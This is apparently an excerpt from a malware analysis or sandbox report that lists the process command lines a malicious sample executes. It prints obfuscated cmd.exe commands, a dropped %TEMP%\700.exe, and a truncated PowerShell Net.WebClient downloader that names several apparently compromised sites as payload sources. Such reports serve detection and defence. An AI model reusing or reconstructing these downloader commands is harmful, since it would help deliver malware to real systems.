Technical information
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%\nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+\4...
- %TEMP%\700.exe
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%\nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+\4...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /V:ON/C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%/nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+/4=h^<Sd{sPJnjujZ[-$gZ[;2~XOIqwXMGok5GJ$O3...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $nCw='Icm';$fKY=new-object Net.WebClient;$fOm='http://baatzconsulting.com/PlKd@http://alistairmccoy.co.uk/2szNjQzX@http://havmore.in/UXxra@http://4theweb.co.uk/_-hacked/7M@http:/...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -